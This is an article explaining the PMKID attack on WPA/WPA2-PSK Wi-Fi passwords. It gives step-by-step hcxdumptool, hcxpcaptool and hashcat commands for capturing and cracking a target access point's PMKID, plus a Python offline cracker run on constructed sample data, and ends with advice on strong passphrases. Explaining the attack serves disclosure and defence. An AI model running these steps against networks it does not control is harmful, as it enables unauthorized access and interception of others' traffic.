New PMKID Attack for Cracking WPA and WPA2 Wi-Fi Passwords
A security researcher has recently disclosed a new technique for attacking WPA/WPA2 Wi-Fi networks that lets attackers recover the pre-shared key of many routers without having to capture a client handshake.
Jens ‘Atom’ Steube, lead developer of Hashcat (a popular password cracking tool), revealed that the new method was discovered accidentally while analyzing the recently launched WPA3 security standard.
The technique works against WPA/WPA2 networks in PSK mode on which PMKID (Pairwise Master Key Identifier) based roaming features are enabled, i.e. access points that include a PMKID in the RSN IE of the first handshake frame.
It allows an attacker to recover the PSK (Pre-Shared Key) passphrase by offline cracking, and thus to join the Wi-Fi network and intercept the traffic on it.
How to Crack a WiFi Password Using the PMKID
According to Steube, in the old WPA2 attack the attacker had to wait for a client to log in to the network and capture the full EAPOL (Extensible Authentication Protocol over LAN, the 802.1X port authentication protocol) 4-way handshake between that client and the access point. The new approach does not require any client to be on the target network at all: the attacker's own machine talks to the access point directly.
Instead, the attacker sends an association request to the access point and, if the AP supports PMKID caching, the AP answers with the first EAPOL frame of the handshake, whose RSN IE (Robust Security Network Information Element) carries the PMKID. That single value is enough to attack the password, because the PMKID is HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA) and, for WPA/WPA2-PSK, the PMK is derived from the passphrase and the SSID alone (PBKDF2-HMAC-SHA1 with 4096 iterations). Candidate passphrases can therefore be tested offline against the captured PMKID, with no handshake from a real client.
Steps for Cracking WiFi Password
Before proceeding, the following tools need to be installed: hcxdumptool, hcxtools (which provides hcxpcaptool) and hashcat.
Step 1 — Run the ‘hcxdumptool’ tool (v4.2.0 or higher) to request the PMKID from the targeted access point and dump the received frame to a file:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
Here wlp39s0f3u4u5 is the wireless interface used in the original example; substitute your own. If the access point receives our association request and supports sending the PMKID, a “FOUND PMKID” message will appear after a moment.
Step 2 — Run ‘hcxpcaptool’ to convert the captured data from pcapng format to the hash format accepted by hashcat (mode 16800: one line per PMKID of the form PMKID*MAC_AP*MAC_STA*ESSID, with every field hex-encoded):
$ ./hcxpcaptool -z test.16800 test.pcapng
Step 3 — Use ‘hashcat’ (v4.2.0 or higher) to recover the WPA pre-shared key. The original example runs a brute-force mask attack (-a 3) over six lowercase letters followed by the literal suffix “t!”; a dictionary attack (-a 0 with a wordlist) works the same way:
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Note: hashcat 6.0 and later deprecate mode 16800 in favor of mode 22000, and current hcxtools releases replace hcxpcaptool with hcxpcapngtool; the workflow is otherwise the same.
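What hashcat does in Step 3, written out in Python as an added example (this is not code from the page, from hashcat or from hcxtools): derive the PMK from each candidate passphrase and the SSID, recompute the PMKID with the two MAC addresses from the hash line, and compare it with the captured value. The SSID, MAC addresses, passphrase and wordlist below are constructed; the hash line is built from the known passphrase so the example runs offline, in the same PMKID*MAC_AP*MAC_STA*ESSID layout that hcxpcaptool writes for mode 16800.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This is the expensive step and the only one that depends on the passphrase,
    which is why a cracker's cost per candidate is dominated by it.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes of HMAC-SHA1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_16800(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """Parse one hashcat -m 16800 line: PMKID*MAC_AP*MAC_STA*ESSID, every field hex-encoded."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError("expected 4 '*'-separated fields, got %d" % len(fields))
    pmkid_hex, ap_hex, sta_hex, essid_hex = fields
    target = bytes.fromhex(pmkid_hex)
    if len(target) != 16:
        raise ValueError("PMKID must be 16 bytes")
    return (target, bytes.fromhex(ap_hex), bytes.fromhex(sta_hex),
            bytes.fromhex(essid_hex).decode("utf-8"))


def crack_pmkid(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline search: for each candidate passphrase derive the PMK, recompute the
    PMKID and compare it with the captured one. Returns the passphrase or None."""
    target, ap_mac, sta_mac, ssid = parse_16800(line)
    for cand in candidates:
        guess = pmkid(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, target):
            return cand
    return None


def make_16800_line(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes) -> str:
    """Build a hash line in the layout hcxpcaptool writes, from a known passphrase.
    Only used here to construct sample data; a real attacker gets the line from a capture."""
    p = pmkid(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac)
    return "*".join([p.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode("utf-8").hex()])


# Constructed sample data (not a real capture): the MAC addresses and SSID are made up,
# and the "captured" PMKID is computed from the known passphrase so the example runs offline.
SAMPLE_SSID = "ExampleNet"
SAMPLE_PASSPHRASE = "sunshine1"
SAMPLE_AP_MAC = bytes.fromhex("4604ba734d4e")
SAMPLE_STA_MAC = bytes.fromhex("89acf0e761f4")
SAMPLE_LINE = make_16800_line(SAMPLE_PASSPHRASE, SAMPLE_SSID, SAMPLE_AP_MAC, SAMPLE_STA_MAC)

# A tiny constructed wordlist standing in for hashcat's mask or dictionary input.
SAMPLE_WORDLIST = ["password", "letmein", "qwerty123", "sunshine1", "welcome1"]

if __name__ == "__main__":
    print("hash line:", SAMPLE_LINE)
    print("recovered:", crack_pmkid(SAMPLE_LINE, SAMPLE_WORDLIST))
```

A line taken from a real test.16800 file can be passed to crack_pmkid as-is. The loop also shows why the defence in the closing paragraph works: every candidate costs a 4096-iteration PBKDF2, so the attacker's only lever is the size of the candidate space, and a long random passphrase puts the search out of reach regardless of how the PMKID was obtained.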
“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” said Jens ‘Atom’ Steube.
Since the new attack only applies to networks with roaming (PMKID) functions enabled, and still has to guess the passphrase offline, users are advised to choose a long, random Wi-Fi passphrase that cannot be brute-forced or found in a wordlist.
For more information visit: Hashcat Forum.